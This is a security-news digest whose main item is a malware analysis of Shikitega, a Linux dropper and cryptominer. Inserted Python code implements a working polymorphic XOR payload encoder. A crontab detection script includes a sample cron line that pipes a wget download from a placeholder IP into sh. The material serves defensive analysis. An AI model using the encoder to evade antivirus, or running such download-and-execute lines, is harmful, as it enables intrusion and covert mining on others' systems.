Transparency and policy shapes Cloudflare’s Kiwi Farms decisions


Cloudflare percolated back into the news cycle last week when the company, which provides security services to websites, dropped Kiwi Farms as a client. Kiwi Farms has a reputation as the worst trolling site on the internet, a place where participants meet to collate information on and create action plans against targeted individuals, for both online and physical harassment including doxing and swatting (making a false emergency report so that a police SWAT team arrives at a given address to neutralize the supposed threat to life).

Social networks were aflame with calls for Cloudflare to cease providing its services to Kiwi Farms. A recent Vice article highlighted the case of Clara Sorrenti, also known as Keffals, an online streamer who has been doxed multiple times and was arrested on August 5 during a raid on her home that resulted from swatting. The same article noted that there have been at least three cases of individuals dying by suicide after targeted harassment organized on Kiwi Farms.


TikTok denies breach after hackers claim billions of user records stolen


TikTok is denying claims that a hacking group has breached an Alibaba cloud database containing 2.05 billion records that include data on TikTok and WeChat users.

The hacking group, which goes by the name AgainstTheWest, on Friday posted screenshots—which they say were taken from the hacked database—on a hacking forum.

According to the hacking group, the breached Alibaba server holds 2.05 billion records in a 790GB database containing user data, platform statistics, source code, cookies, auth tokens, server information, and other data. The hackers also claimed they have yet to decide whether to sell the data or release it to the public.


Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution.


Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution.

Adobe Commerce is an offering that provides companies with a flexible and scalable end-to-end platform to manage their customers' commerce experiences.
Adobe Acrobat and Reader are used to view, create, print, and manage PDF files.
Illustrator is a vector graphics editor and design program.
FrameMaker is a document processor designed for writing and editing large or complex documents.
Premiere Elements is video editing software similar to Premiere Pro.
Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.


Kicking Off a New School Year with New Online Habits


Almost every parent loves a new school year, most likely because the beloved milestone offers us a clean slate and a chance to do things better, shape new habits, and close those digital safety gaps.

The hope that fuels change is a powerful thing. However, if you want to ensure your new habits stick, there’s some science you might consider. Psychologists suggest that to make a new change permanent, you should start with smaller, micro-size choices that will lead to sustainable patterns and habits. Micro habits allow you to take safe steps that are too small to fail but effective enough to generate long-term change. 

Committing to Micro-Habits 

Breaking the task of online safety down into bite-sized pieces is a great approach for parents eager to put better habits into play this year. Establishing new ground rules doesn't have to include restrictions, tantrums, or tears. You can start small, commit to working together, and build your new habits over time.

So often in this blog we offer a combination of practical digital tips proven to work, such as robust password protocols, privacy settings, parental controls, smartphone protection, and social network/app safety.

Today, however, we will flip that approach and give you some foundations that will no doubt support and amplify your family’s daily online safety efforts. Ready? Here we go! 

5 Foundations of Healthy Family Tech Habits 

1. Put connection first.

We’re all connected 24/7 but to what? Equipping kids to make wise decisions online begins with intentional, face-to-face connection at home with a parent or caregiver. When the parent-child relationship is strong, trust grows, and conversation flows. If and when a challenge arises, your child is more likely to turn to you.  

Micro-habit: If your family doesn’t eat dinner together, start with one night a week (stay consistent with the day). Make the dinner table a no-phone zone and spend that time together listening and connecting. Build from there.  


2. Step into their world. 

The new school year is a chance to get more involved with your child’s day-to-day communities (on and offline), including their teachers, friend groups, or hobbies. If you’ve been on the sidelines in the past, taking a few steps into their world can give you an exceptional understanding of their online life. Knowing where they go and who they know online has never been more critical, as outlined in our recent Connected Family Report. 

Micro-habit: Does your child have a favorite app? Download it, look around, and understand the culture.  

3. Prioritize sleep. 

Summer—coupled with extra time online (often unmonitored)—can wreak havoc on a child’s sleep patterns, which, in turn, wreaks havoc on a family. If you have a tween or teen, ensuring they get the required hours of sleep is a significant way to keep them safe online. Think about it. Fatigue can impair judgment, increase anxiety, impact grades, and magnify moodiness, putting a child’s physical and emotional wellbeing at risk online and off.  

Micro-habit: Think about setting a phone curfew that everyone agrees on. Giving your child input into the curfew makes it less of a restriction and more of a health or lifestyle shift. Remember, your child’s device is their lifeline to their peers so cutting them off isn’t a long-term solution.  

4. Monitor mental health. 

With kids spending so much time on apps like TikTok, Instagram, Snapchat, and YouTube, those platforms inevitably influence your child more than just about anyone. Be on the lookout for behavior changes in your child that may be connected to digital risks such as cyberbullying, sextortion, gaming addiction, inappropriate content, or connecting with strangers.

Micro-habit: Consider setting time limits that allow your child to enjoy their online hangouts without being consumed or overly influenced by the wrong voices. Apply limits in small blocks at first and grow from there.  

5. Aim for balance. 

Balancing your online life with face-to-face activities and relationships is a must for your child’s physical and emotional wellbeing. But sometimes, striving for that balance can feel overwhelming. Being too stringent can cause big plans to collapse, sending our behaviors in the opposite direction. Balance requires constant re-calibration and pausing to take those small bites. 

Micro-habit: Commit to one family outdoor activity together a month. Take a hike, learn to fish, take up tennis. Make the outings phone-free zones. Be consistent with your monthly micro-habit and build from there.  

It’s been proven that any change you attempt to make ignites a degree of friction. And prolonged friction can discourage your efforts to stick to new habits. Ignore that noise and keep moving forward. Stay the course parents because this is the year your best intentions take shape.   

The post Kicking Off a New School Year with New Online Habits appeared first on McAfee Blog.


Shikitega – New stealthy malware targeting Linux


Executive summary

AT&T Alien Labs has discovered a new malware family targeting endpoints and IoT devices running Linux operating systems. Shikitega is delivered in a multistage infection chain in which each module is responsible for one part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that is executed and set to persist.

Key takeaways:

The malware downloads and executes Metasploit's "Mettle" Meterpreter to maximize its control over infected machines.
Shikitega exploits system vulnerabilities to gain high privileges, persist, and execute a cryptominer.
The malware uses a polymorphic encoder to make it more difficult for anti-virus engines to detect.
Shikitega abuses legitimate cloud services to host some of its command and control servers (C&C).

Figure 1. Shikitega operation process.

Background

With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half of 2022, threat actors find Linux-based servers, endpoints and IoT devices increasingly valuable and keep finding new ways to deliver their malicious payloads. New malware families such as BotenaGo and EnemyBot are examples of how malware authors rapidly incorporate recently discovered vulnerabilities to find new victims and increase their reach.

Shikitega uses an infection chain in multiple layers: the first stage contains only a few hundred bytes, and each module is responsible for a specific task, from downloading and executing the Metasploit Meterpreter, exploiting Linux vulnerabilities and setting persistence on the infected machine, to downloading and executing a cryptominer.

Analysis

The main dropper is a very small ELF file: its total size is only around 370 bytes, and its actual code size is around 300 bytes (figure 2).

Figure 2. Malicious ELF file with a total of only 376 bytes.

The malware uses the "Shikata Ga Nai" polymorphic XOR additive feedback encoder, one of the most popular encoders in Metasploit. The malware runs through several decode loops, where each loop decodes the next layer, until the final shellcode payload is decoded and executed. The decoder stub is generated with dynamic instruction substitution and dynamic block ordering, and registers are selected dynamically, which is what makes the stub polymorphic: the same payload encoded twice yields different bytes. Below we can see how the stub decodes the first two loops (figures 3 and 4):

Figure 3. First “Shikata Ga Nai” decryption loop.

Figure 4. Second “Shikata Ga Nai” decryption loop created by the first one.
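The two decode loops in figures 3 and 4 reduce to a small piece of arithmetic, reproduced here as an added example (my own code, not the report's analysis tooling and not Metasploit's Ruby encoder). It models the classic x86 Shikata Ga Nai stub pattern, `xor [mem], key` followed by `add key, [mem]`, in which the key is updated with the dword that has just been decoded, and it chains several layers the way the report describes one loop revealing the next. The sample payload and the keys are constructed for the example; instruction substitution, block ordering and the FPU GetPC trick are not modelled.

```python
"""
Shikata Ga Nai style XOR additive-feedback encoding, modelled in Python.
Added example, not code from the AT&T Alien Labs report or from Metasploit.
Each dword is XORed with a 32-bit key; the key is then advanced by the
decoded (plaintext) dword, as the in-place x86 stub does.
"""
import struct

MASK32 = 0xFFFFFFFF


def _pad4(data: bytes) -> bytes:
    """The encoder works on whole dwords; pad with zero bytes (assumption of this example)."""
    return data + b"\x00" * (-len(data) % 4)


def sgn_encode(payload: bytes, key: int) -> bytes:
    """enc_i = plain_i ^ key_i ; key_{i+1} = (key_i + plain_i) mod 2^32."""
    key &= MASK32
    out = bytearray()
    for (plain,) in struct.iter_unpack("<I", _pad4(payload)):
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & MASK32
    return bytes(out)


def sgn_decode(blob: bytes, key: int) -> bytes:
    """Mirror of the stub: xor the dword in place, then add the decoded dword to the key."""
    if len(blob) % 4:
        raise ValueError("encoded blob must be dword aligned")
    key &= MASK32
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", blob):
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32
    return bytes(out)


def sgn_encode_layers(payload: bytes, keys: list) -> bytes:
    """Wrap the payload in several layers; the innermost key is applied first."""
    blob = payload
    for key in reversed(keys):
        blob = sgn_encode(blob, key)
    return blob


def sgn_decode_layers(blob: bytes, keys: list) -> bytes:
    """Peel the layers in the order a chain of decoder stubs would run them."""
    for key in keys:
        blob = sgn_decode(blob, key)
    return blob


def ciphertext_varies(payload: bytes, keys: list) -> bool:
    """True when every key yields a distinct ciphertext, i.e. no fixed byte signature."""
    return len({sgn_encode(payload, k) for k in keys}) == len(keys)


# Constructed sample payload (24 bytes): a stand-in for the real shellcode.
SAMPLE_PAYLOAD = b"/bin/sh\x00" + bytes(range(1, 17))


if __name__ == "__main__":
    keys = [0xDEADBEEF, 0x13371337, 0x00C0FFEE]
    blob = sgn_encode_layers(SAMPLE_PAYLOAD, keys)
    print("layered blob:", blob.hex())
    print("decoded     :", sgn_decode_layers(blob, keys))
    print("distinct ciphertext per key:", ciphertext_varies(SAMPLE_PAYLOAD, keys))
```

Because the key is fed back from the plaintext, a single-bit error in the encoded stream corrupts every following dword, and because the initial key (and the stub around it) changes per sample, a byte signature on the encoded body does not survive re-encoding; detection has to key on the stub's behaviour or on what the decoded stage does, which is why the report leans on behaviour such as the syscall pattern and the network traffic.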

After several decode loops, the final payload shellcode is decoded and executed. The malware has no imports; it issues system calls directly with 'int 0x80', the 32-bit x86 syscall interface. Because the main dropper code is so small, it downloads and executes additional commands from its command and control server by invoking syscall number 102 (sys_socketcall), the multiplexed socket syscall of the i386 ABI (figure 5).

Figure 5. Calling system functions using interrupts

The C&C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.

Figure 6. Additional commands received from C&C.

The received command downloads additional files from the server that are never written to disk; they are executed from memory only (figure 7).

Figure 7. Executes additional shell code received from C&C.

In other versions of the malware, it uses the 'execve' syscall to execute '/bin/sh' with the command received from the C&C (figure 8).

Figure 8. Executing shell commands by using syscall_execve.

The malware downloads and executes 'Mettle', the native Metasploit Meterpreter implementation for Linux and embedded targets, which gives the attacker a wide range of capabilities: webcam control, packet sniffing, multiple reverse shell transports (TCP, HTTP and others), process control, shell command execution and more.

In addition, the malware uses wget to download and execute the next-stage dropper.

Next stage dropper

The next downloaded and executed file is another small ELF file (around 1 KB) encoded with the "Shikata Ga Nai" encoder. It decrypts a shell command and executes it by calling syscall_execve with '/bin/sh' as the program and the decrypted command as its argument (figure 9).

Figure 9. Second stage dropper decrypts and executes shell commands.

The executed shell command downloads and executes additional files. To run the next and last stage dropper with elevated privileges, it exploits two Linux privilege-escalation vulnerabilities: CVE-2021-4034 (PwnKit, in polkit's pkexec) and CVE-2021-3493 (the Ubuntu OverlayFS file capabilities bug) (figures 10 and 11).

Figure 10. Exploiting Linux vulnerability CVE-2021-3493.

Figure 11. Exploiting CVE-2021-4034 vulnerability.

The malware leverages whichever exploit succeeds to download and execute the final stage with root privileges: the persistence scripts and the cryptominer payload.

Persistence

To achieve persistence, the malware downloads and executes a total of five shell scripts. It persists by adding four crontab entries: two for the currently logged-in user and two for root. It first checks whether the crontab command exists on the machine; if not, the malware installs it and starts the crontab service.

To make sure only one instance is running, it uses the flock command with the lock file "/var/tmp/vm.lock".

Figure 12. Adding root crontab to execute the final payload.

Below is the list of scripts downloaded and executed to achieve persistence:

script name    details
unix.sh        Checks whether the crontab command exists on the system; if not, installs it and starts the crontab service.
brict.sh       Adds a crontab entry for the current user to execute the cryptominer.
politrict.sh   Adds a root crontab entry to execute the cryptominer.
truct.sh       Adds a crontab entry for the current user to download the cryptominer and its config from the C&C.
restrict.sh    Adds a root crontab entry to download the cryptominer and its config from the C&C.

Once persistence through crontab is in place, the malware deletes all downloaded files from the system to hide its presence; the crontab entries and the lock file are what remain on disk.
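Since the crontab entries and the flock lock file are the artifacts that survive the clean-up, the natural host-side check is to read the user and root crontabs and flag entries that behave the way the persistence scripts above do. The script below is an added example of that triage logic (my own code, not the report's or AT&T Alien Labs' tooling). The rules are assumptions derived from the behaviour described in this section, not signatures published by the authors, and the two sample crontab listings are constructed for the example; the report does not reproduce the exact command lines Shikitega writes.

```python
"""
Triage check for crontab-based persistence of the kind described above.
Added example, not code from the AT&T Alien Labs report. Parses `crontab -l`
style output for a user and for root and flags entries that use a flock lock
on /var/tmp/vm.lock, pipe a wget/curl download into a shell, or run a program
out of a temp directory. Rules and sample data are assumptions of this example.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Tuple

LOCK_FILE = "/var/tmp/vm.lock"

# (rule name, regex applied to the command part of a cron entry)
RULES = [
    ("flock-lockfile", re.compile(r"\bflock\b.*" + re.escape(LOCK_FILE))),
    ("download-and-execute", re.compile(r"\b(wget|curl)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("exec-from-tmp", re.compile(r"(^|[\s;|&])/(var/)?tmp/\S+")),
]

# Either a five-field schedule or an @-alias, followed by the command.
CRON_LINE = re.compile(r"^(?P<sched>(@\w+|(\S+\s+){5}))\s*(?P<cmd>.+)$")


@dataclass
class Finding:
    user: str
    line_no: int
    rule: str
    command: str


def parse_crontab(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, schedule, command) for every real cron entry in the listing."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank line, comment, or VAR=value assignment
        m = CRON_LINE.match(line)
        if m:
            entries.append((n, m.group("sched").strip(), m.group("cmd").strip()))
    return entries


def scan_crontab(user: str, text: str) -> List[Finding]:
    """Apply every rule to every entry; one finding per (entry, rule) hit, in rule order."""
    findings = []
    for n, _sched, cmd in parse_crontab(text):
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(user, n, name, cmd))
    return findings


def read_live_crontab(user: Optional[str] = None) -> str:
    """Read a real crontab from the host (root's needs privileges). Empty if none."""
    cmd = ["crontab", "-l"] + (["-u", user] if user else [])
    try:
        r = subprocess.run(cmd, capture_output=True, text=True)
    except FileNotFoundError:  # no crontab binary on this box
        return ""
    return r.stdout if r.returncode == 0 else ""


# Constructed samples: two benign entries and two modelled on the report's description.
SAMPLE_USER_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * flock -n /var/tmp/vm.lock /var/tmp/.x/miner -c /var/tmp/.x/config.json
"""
SAMPLE_ROOT_CRONTAB = """\
@reboot /usr/sbin/ntpdate pool.ntp.org
0 * * * * wget -q -O - http://198.51.100.7/restrict.sh | sh
"""

if __name__ == "__main__":
    hits = scan_crontab("user", SAMPLE_USER_CRONTAB) + scan_crontab("root", SAMPLE_ROOT_CRONTAB)
    for f in hits:
        print(f"[{f.user}:{f.line_no}] {f.rule}: {f.command}")
```

On a real host, replace the sample strings with `read_live_crontab()` for the logged-in users and `read_live_crontab("root")`, and pair the result with a check for the lock file itself: an existing /var/tmp/vm.lock held open by a running process is a stronger signal than the crontab text alone, since the malware deletes its scripts but keeps the miner running under the lock.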

Cryptominer payload

The malware downloads and executes XMRig, a popular miner for the Monero cryptocurrency. It also sets a crontab entry to download and execute the miner and its config from the C&C, as described in the persistence section above.

Figure 13. XMRig miner is downloaded and executed on an infected machine.

Command and control

Shikitega hosts some of its command and control servers (C&C) on legitimate cloud services, as shown by OTX in figure 14. Because the malware in some cases contacts the C&C directly by IP address without a domain name, it is difficult to provide a complete list of indicators for detection: the addresses are volatile and will be reused for legitimate purposes within a short period of time.

Figure 14. Command and control server hosted on a legitimate cloud hosting service.

Recommended actions

Keep software up to date with security updates; in particular, make sure the fixes for CVE-2021-4034 (polkit pkexec) and CVE-2021-3493 (Ubuntu kernel OverlayFS) are applied, since these are the two privilege-escalation bugs the malware relies on to reach root.
Install antivirus and/or EDR on all endpoints.
Review the crontabs of logged-in users and of root for unexpected entries, and check for the lock file /var/tmp/vm.lock, since these are the persistence artifacts that remain after the malware removes its downloaded files.
Use a backup system to back up server files.

Conclusion

Threat actors continue to look for new ways to deliver malware while staying under the radar and avoiding detection. Shikitega is delivered in a sophisticated way: it uses a polymorphic encoder and delivers its payload gradually, with each step revealing only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!

Associated Indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note that the pulse may include other related activity that is out of the scope of this report.

TYPE    INDICATOR                                                          DESCRIPTION
DOMAIN  dash[.]cloudflare.ovh                                              Command and control
DOMAIN  main[.]cloudfronts.net                                             Command and control
SHA256  b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331   Malware hash
SHA256  0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed   Malware hash
SHA256  f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb   Malware hash
SHA256  8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732   Malware hash
SHA256  d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374   Malware hash
SHA256  fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765   Malware hash
SHA256  e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d   Malware hash
SHA256  cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d   Malware hash
SHA256  d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8   Malware hash
SHA256  29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8   Malware hash
SHA256  4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7   Malware hash
SHA256  130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5   Malware hash
SHA256  3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098   Malware hash
SHA256  6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275   Malware hash
SHA256  7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad   Malware hash
SHA256  2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab   Malware hash, CVE-2021-3493 exploit
SHA256  4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f   Malware hash, CVE-2021-4034 exploit
SHA256  e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4   Malware hash
SHA256  64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4   Malware shell script
SHA256  623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955   Malware shell script
SHA256  59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af   Malware shell script
SHA256  9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338   Malware shell script
SHA256  05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464   Malware shell script
SHA256  ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d   Malware hash

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0002: Execution

T1059: Command and Scripting Interpreter
T1569: System Service

T1569.002: Service Execution

TA0003: Persistence

T1543: Create or Modify System Process

TA0005: Defense Evasion

T1027: Obfuscated Files or Information
